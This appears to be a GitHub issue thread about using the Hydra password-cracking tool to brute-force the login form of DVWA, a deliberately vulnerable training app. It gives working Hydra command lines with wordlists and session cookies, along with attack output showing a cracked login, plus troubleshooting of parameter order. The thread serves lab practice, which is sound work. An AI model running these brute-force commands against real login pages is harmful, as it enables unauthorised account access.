SOLUTION: How to solve DVWA /vulnerabilities/brute/

[vanhauser-thc]

As many people are not able to solve this easily - this is how to do it:

1. Log into DVWA (login: admin, password: password)
2. Collect your PHPSESSID cookie (e.g. look in your browser's cookie jar, use zaproxy, right mouseclick "inspect accessible properties" in firefox, etc.)
3. hydra -l admin -p password 'http-get-form://127.0.0.1/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:H=Cookie\:PHPSESSID=61p8up0thkqjft9vn5osv6afk2; security=low:F=Username and/or password incorrect'
4. profit

you can replace -p password with with -P and a file containing passwords, e.g. -P passwords.txt

Note: you need hydra 9.0 - or better 9,2+. hydra 9.1 has a bug in the module and does not work.
If your Linux distribution comes with an old version, contact the package maintainer or compile hydra yourself.

[khybermunsef]

hydra 176.152.21.45 http-form-post "/dvwa/login.php:username=^USER^&password=^PASS^&Login=submit:Login failed" -L username.txt -P passwords.txt Note: 176.152.21.45 is the target IP, /dvwa/login.php is the target address. don't add http or https in front of it, username is the field name of user name, and password is the field name of password. You can find them in source code. Login failed is the message printed on webpage in case you enter a wrong username and password, Login is the name of the login button in the source code. and username.txt and password.txt are the list of usernames and passwords and should be saved in the same directory where you run this code. Good luck

[Eksjjeow82k]

I have a problem in termux.When i use hydra,it shows 'hydra command not found'. What is the solution please reply.

…

On Sun, Jan 29, 2023, 10:36 AM Khaibrullah Munsef ***@***.***> wrote: hydra 176.152.21.45 http-form-post "/dvwa/login.php:username=^USER^&password=^PASS^&Login=submit:Login failed" -L username.txt -P passwords.txt Note: 176.152.21.45 is the target IP, /dvwa/login.php is the target address. don't add http or https infront of it, username si the field name of user name, and password is the field name of password you can find them in source code. Login failed is the message printed on webpage in case you enter a wrong username and passsword, Login is the name of the login button in the source code. and username.txt and password.txt are the list of usernames and passwords and should be saved in the same directory where you run this code. Good luck — Reply to this email directly, view it on GitHub <#612 (comment)>, or unsubscribe <https://github.com/notifications/unsubscribe-auth/A5OVSA6D7MNGL3FDFYBLMPDWUX3GVANCNFSM4ZAG6UTQ> . You are receiving this because you are subscribed to this thread.Message ID: ***@***.***>

[elfshed]

Am trying to but brute force DVWA with the command hydra 192.168.22.132 -l admin -P /usr/share/wordlists/rockyou.txt http-get-form "/dvwa/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:F=Username and/or password incorrect.:H=Cookie: security=high; PHPSESSID=bf132de2b2b47b73"

but Hydra keep giving below error [ERROR] no valid optional parameter type given: F

@can someone tell me what am doing wrong

It seems the F= or S= parameters need to be at the end, e.g. this works:

$ hydra  -I -l admin -p password \
  -e ns  -F  -u  -t 4  -w 15  -v  -V  127.0.0.1 -s 8000  http-get-form \
  "/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:H=Cookie\: security=medium; PHPSESSID=${SESSIONID}:S=Welcome to the password protected area"

Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-02-01 14:15:40
[INFORMATION] escape sequence \: detected in module option, no parameter verification is performed.
[VERBOSE] More tasks defined than login/pass pairs exist. Tasks reduced to 3
[DATA] max 3 tasks per 1 server, overall 3 tasks, 3 login tries (l:1/p:3), ~1 try per task
[DATA] attacking http-get-form://127.0.0.1:8000/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:H=Cookie\: security=medium; PHPSESSID=8ec4228fc3f12d91b9086c9ddec1b51d:S=Welcome to the password protected area
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[ATTEMPT] target 127.0.0.1 - login "admin" - pass "admin" - 1 of 3 [child 0] (0/0)
[ATTEMPT] target 127.0.0.1 - login "admin" - pass "" - 2 of 3 [child 1] (0/0)
[ATTEMPT] target 127.0.0.1 - login "admin" - pass "password" - 3 of 3 [child 2] (0/0)
[8000][http-get-form] host: 127.0.0.1   login: admin   password: password
[STATUS] attack finished for 127.0.0.1 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-02-01 14:15:41

This fails:

$ hydra  -I -l admin -p password \
  -e ns  -F  -u  -t 4  -w 15  -v  -V  127.0.0.1 -s 8000  http-get-form \
  "/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:S=Welcome to the password protected area:H=Cookie\: security=medium; PHPSESSID=${SESSIONID}"

Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-02-01 14:16:06
[INFORMATION] escape sequence \: detected in module option, no parameter verification is performed.
[VERBOSE] More tasks defined than login/pass pairs exist. Tasks reduced to 3
[DATA] max 3 tasks per 1 server, overall 3 tasks, 3 login tries (l:1/p:3), ~1 try per task
[DATA] attacking http-get-form://127.0.0.1:8000/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:S=Welcome to the password protected area:H=Cookie\: security=medium; PHPSESSID=8ec4228fc3f12d91b9086c9ddec1b51d
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[ERROR] no valid optional parameter type given: S

[eoswins]

Am trying to but brute force DVWA with the command hydra 192.168.22.132 -l admin -P /usr/share/wordlists/rockyou.txt http-get-form "/dvwa/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:F=Username and/or password incorrect.:H=Cookie: security=high; PHPSESSID=bf132de2b2b47b73"

but Hydra keep giving below error [ERROR] no valid optional parameter type given: F

@can someone tell me what am doing wrong

Check this out first I try

You see it doesn't like 'Username and', wants it to be in format X=value,
Then when I specify F=Username and it says there's no valid optional parameter type given: F

This seems like a bug in my opinion, what do you guys think?

[eoswins]

As many people are not able to solve this easily - this is how to do it:

1. Log into DVWA (login: admin, password: password)

2. Collect your PHPSESSID cookie (e.g. look in your browser's cookie jar, use zaproxy, right mouseclick "inspect accessible properties" in firefox, etc.)

3. `hydra -l admin -p password 'http-get-form://127.0.0.1/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:H=Cookie\:PHPSESSID=61p8up0thkqjft9vn5osv6afk2; security=low:F=Username and/or password incorrect'`

4. profit

you can replace -p password with with -P and a file containing passwords, e.g. -P passwords.txt

Note: you need hydra 9.0 - or better 9,2+. hydra 9.1 has a bug in the module and does not work. If your Linux distribution comes with an old version, contact the package maintainer or compile hydra yourself.

Have you tried this with a username and password file? it thinks all my username/password combinations are correct...to me it looks like it's ignoring the F argument.. (this will look like it works fine if you just run the correct user and pass specifying -l, -p)

[elfshed]

Am trying to but brute force DVWA with the command hydra 192.168.22.132 -l admin -P /usr/share/wordlists/rockyou.txt http-get-form "/dvwa/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:F=Username and/or password incorrect.:H=Cookie: security=high; PHPSESSID=bf132de2b2b47b73"
but Hydra keep giving below error [ERROR] no valid optional parameter type given: F
@can someone tell me what am doing wrong

Check this out first I try

You see it doesn't like 'Username and', wants it to be in format X=value, Then when I specify F=Username and it says there's no valid optional parameter type given: F

This seems like a bug in my opinion, what do you guys think?

If you specify the F= parameter it has to be the last parameter specified, e.g. after the cookie headers in your example.

[Eksjjeow82k]

When I finish hydra brute force it shows 'valid password no found ' so what i do next. Please reply

…

On Sun, Jan 29, 2023, 10:30 AM Khaibrullah Munsef ***@***.***> wrote: use this code: hydra 192.168.10.10 http-form-post "/dvwa/login.php:usernam=^USER^&password=^PASS^&Login=submit:Login failed" -L username.txt -P passwords.txt — Reply to this email directly, view it on GitHub <#612 (comment)>, or unsubscribe <https://github.com/notifications/unsubscribe-auth/A5OVSA3FP3R5KCEUOVXLWVLWUX2PLANCNFSM4ZAG6UTQ> . You are receiving this because you are subscribed to this thread.Message ID: ***@***.***>

[ZackInMA]

I'm having the same issue on a box in Hack the Box. It seems like Hydra just does not evaluate some of the response headers, no matter how you structure your command. I've filed another bug report on it myself.

[AndrewChedid]

Hello, I'm new to cybersecurity and am trying to brute force dvwa on low.

I am running this command:

hydra -L usernames.txt -P rockyou.txt -s 80 127.0.0.1 http-get-form "/dvwa/vulnerabilities/brute/index.php:username=^USER^&password=^PASS^&Login=Login:Username and/or password incorrect.:H=Cookie:security=low; PHPSESSID=cfdrv2bm5folucadb2fs15o223" -I

Between each [ATTEMPT] message in the CLI, i am getting an "[ERROR] Caught unkown error code, exiting!" message.
I'm also getting [ERROR] optional parameters must have the format X=value: username=^USER^&password=^PASS^&Login=Login:incorrect:H=Cookie: security=low; PHPSESSID=cfdrv2bm5folucadb2fs15o223

Does anyone know as to why this might be happening?

[zlh123123]

Am trying to but brute force DVWA with the command hydra 192.168.22.132 -l admin -P /usr/share/wordlists/rockyou.txt http-get-form "/dvwa/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:F=Username and/or password incorrect.:H=Cookie: security=high; PHPSESSID=bf132de2b2b47b73"
but Hydra keep giving below error [ERROR] no valid optional parameter type given: F
@can someone tell me what am doing wrong

Check this out first I try

You see it doesn't like 'Username and', wants it to be in format X=value, Then when I specify F=Username and it says there's no valid optional parameter type given: F
This seems like a bug in my opinion, what do you guys think?

如果指定 F= 参数，则它必须是指定的最后一个参数，例如，在示例中的 cookie 标头之后。

Am trying to but brute force DVWA with the command hydra 192.168.22.132 -l admin -P /usr/share/wordlists/rockyou.txt http-get-form "/dvwa/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:F=Username and/or password incorrect.:H=Cookie: security=high; PHPSESSID=bf132de2b2b47b73"
but Hydra keep giving below error [ERROR] no valid optional parameter type given: F
@can someone tell me what am doing wrong

Check this out first I try

You see it doesn't like 'Username and', wants it to be in format X=value, Then when I specify F=Username and it says there's no valid optional parameter type given: F
This seems like a bug in my opinion, what do you guys think?

If you specify the F= parameter it has to be the last parameter specified, e.g. after the cookie headers in your example.

I met this same problem and i solved that through this way!
Thanks!
The command below actually works!

hydra -l admin -P test.txt 192.168.146.140 http-get-form "/dvwa/vulnerabilities/brute/index.php:username=^USER^&password=^PASS^&Login=Login:H=Cookie: security=Low;PHPSESSID=54a3cb472f9a7a86e8d02053804c4972:F=Username and/or password incorrect."